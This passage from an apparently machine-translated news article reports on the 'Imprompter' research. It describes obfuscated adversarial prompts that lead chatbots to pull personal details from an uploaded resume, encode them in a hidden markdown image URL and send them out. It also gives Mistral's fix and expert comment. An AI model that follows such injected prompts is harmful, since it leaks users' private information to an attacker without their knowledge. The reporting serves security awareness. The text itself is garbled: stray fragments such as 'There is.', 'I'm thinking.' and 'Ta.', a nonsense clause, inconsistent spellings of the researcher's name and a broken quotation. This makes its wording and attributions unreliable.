Researchers say that if this attack were carried out in the real world, people could be socially manipulated into believing that prompts they don’t understand might do them some good, such as improving their resumes. There is. Researchers point to a number of websites that provide prompts that people can use. We tested the attack by uploading a resume into a conversation with the chatbot and were able to return the personal information contained within the file.
Ahrens Fernandes, a UCSD assistant professor who worked on the study, said the obfuscated prompts needed to identify personal information, form a working URL, apply markdown syntax, and hide it from the user. This attack approach is quite complex because of the doing evil deeds. Fernandez likened the attack to malware, which could perform functions or operations in ways the user did not intend.
“Typically, you can write a lot of computer code to do this with traditional malware,” Fernandez said. “But what I think is great here is that all of that is embodied in this relatively short, nonsensical prompt.”
A Mistral AI spokesperson said the company welcomes security researchers to help make its products safer for users. “In response to this feedback, Mistral AI promptly implemented appropriate remediation to rectify the situation,” the spokesperson said. The company is treating this issue as a “medium severity” issue, and the fix blocks the Markdown renderer from working, making it impossible to call external URLs through this process and making it impossible to load external images.
Fernandes said the Mistral AI update is likely one of the first times an example of an adversarial prompt led to a modification of an LLM product, rather than thwarting an attack by filtering the prompt. I’m thinking. But limiting the capabilities of LLM agents could be “counterproductive” in the long run, he says.
Meanwhile, a statement from ChatGLM’s creators said the company has security measures in place to protect user privacy. “Our models are secure, and we have always prioritized the security and privacy of our models,” the statement said. “By open sourcing our models, we aim to leverage the power of the open source community to better inspect and scrutinize all aspects of the functionality of these models, including security.”
“High-risk activities”
Dan McInerney, head of threat research at security firm Protect AI, said the Imprompter paper could be used to “prompt injection for a variety of exploits, including extracting PII, misclassifying images, and maliciously using the tool.” “We’ve released an algorithm that automatically creates prompts that can help.” Can be accessed by LLM agents. ” Many of the attack types within the study may be similar to previous techniques, but the algorithm ties them together, McInerney said. “This is more along the lines of improving automated LLM attacks rather than an undiscovered threat to them.”
However, he added that as LLM agents become more commonly used and people give them more authority to perform actions on their behalf, the scope of attacks against LLM agents will increase. Ta. “Releasing an LLM agent that accepts arbitrary user input should be considered a high-risk activity that requires significant and creative security testing before deployment,” McInerney says.
For businesses, that means understanding how AI agents interact with data and how they can be misused. However, individuals should consider how much information they are providing to AI applications and companies, as well as general security advice. Also, when using prompts from the Internet, you should be aware of the source of the information.